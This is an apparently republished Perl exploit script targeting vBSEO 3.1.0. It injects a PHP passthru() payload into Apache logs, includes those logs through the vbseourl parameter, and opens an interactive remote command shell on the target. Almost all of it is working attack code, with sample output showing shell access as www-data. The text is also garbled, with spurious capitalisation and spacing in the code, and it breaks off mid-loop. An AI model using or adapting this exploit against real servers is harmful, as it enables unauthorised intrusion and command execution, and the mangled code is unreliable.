! /Usr/bin/perl
######################################## ############################
# VBseo 3.1.0 (vbseo. php vbseourl) Remote Command Execution Exploit
# Vendor: http://www.vbseo.com/
#
# Author: Jose Luis Gongora Fernandez (a. k. a) JosS
# Twitter: @ JossGongora
# Mail: joss. xroot (0x40) gmail (0x2e) com
# Site: http://www.hack0wn.com/
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Thanks: CWH Underground
#
######################################## ############################
# OUTPUT:
#
# Trying to Inject the Code...
# Successfully injected in.../../var/log/apache2/access. log
#
# [Shell]: ~ $ Id
# Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
# [Shell]: ~ $ Uname-
# Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [Shell]: ~ $ Exit
# Joss @ h4x0rz :~ /Desktop $
Use LWP: UserAgent;
Use IO: Socket;
Use LWP: Simple;
@ Apache = (
".../Apache/logs/error. log ",
".../Apache/logs/access. log ",
".../Apache/logs/error. log ",
".../Apache/logs/access. log ",
".../Apache/logs/error. log ",
".../Apache/logs/access. log ",
".../Etc/httpd/logs/acces_log ",
".../Etc/httpd/logs/acces. log ",
".../Etc/httpd/logs/error_log ",
".../Etc/httpd/logs/error. log ",
".../Var/www/logs/access_log ",
".../Var/www/logs/access. log ",
".../Usr/local/apache/logs/access_log ",
".../Usr/local/apache/logs/access. log ",
".../Var/log/apache/access_log ",
".../Var/log/apache2/access_log ",
".../Var/log/apache/access. log ",
".../Var/log/apache2/access. log ",
".../Var/log/access_log ",
"..././Var/log/access. log ",
".../Var/www/logs/error_log ",
".../Var/www/logs/error. log ",
".../Usr/local/apache/logs/error_log ",
".../Usr/local/apache/logs/error. log ",
".../Var/log/apache/error_log ",
".../Var/log/apache2/error_log ",
".../Var/log/apache/error. log ",
".../Var/log/apache2/error. log ",
"..././Var/log/error_log ",
".../Var/log/error. log ",
".../Var/log/access_log ",
".../Var/log/access_log"
);
System ($ ^ O eq MSWin32 )? Cls: clear );
Print "###################################### #################################";
Print "# vBseo 3.1.0 (vbseo. php vbseourl) Remote Command Execution Exploit #";
Print "###################################### #################################";
If (! $ ARGV [0])
{
Print "Usage: perl exploit. pl [host]";
Print "perl exploit. pl localhost ";
Exit ;}
$ Host = $ ARGV [0];
$ Path = "/vbseo. php? Vbseoembedd = 1 & vbseourl = "; # change if it is necesary
# If ($ host = ~ /^ Http:/) {$ host = ~ S/http: // g ;}
Print "Trying to Inject the Code ...";
$ CODE = "<? Passthru ($ _ GET [cmd])?> ";
$ Socket = IO: Socket: INET-> new (Proto => "tcp", PeerAddr => "$ host", PeerPort => "80 ") or die "cocould not connect to host. ";
Print $ socket "GET/images /". "##% $ % ##". $ CODE. "##% $ % ##". "HTTP/1.1 ";
Print $ socket "Host:". $ host ."";
Print $ socket "Connection: close ";
Close ($ socket );
If ($ host !~ /^ Http:/) {$ host = "http: //". $ host ;}
Foreach $ getlog (@ apache)
{
Chomp ($ getlog );
$ Find = $ host. $ path. $ getlog; # $ find = $ host. $ path. $ getlog. "% 00 ";
$ Xpl = LWP: UserAgent-> new () or die "cocould not initialize browser ";
$ Req = HTTP: Request-> new (GET => $ find );
$ Res = $ xpl-> request ($ req );
$ Info = $ res-> content;
If ($ info = ~ // ##\% $ \%###/) # Change if it is necesary
{Print "Successfully injected in $ getlog"; $ log = $ getlog; last ;}
}
Print "[shell]: ~ $ ";
Chomp ($ cmd = <STDIN> );
While ($ cmd !~ "Exit "){
$ Shell = $ host. $ path. $ log. "& cmd = $ cmd"; # $ shell = $ host. $ path. $ log. "% 00 & cmd = $ cmd ";
$ Xpl = LWP: UserAgent-> new () or die "cocould not initialize browser ";
$ Req = HTTP: Request-> new (GET => $ shell );
$ Res = $ xpl-> request ($ req );
$ Info = $ res-> content;
If ($ info = ~ /## % $ % ##(.*?) # % $ % #/Sg)
{Print $1 ;}
Print "[shell]: ~ $ ";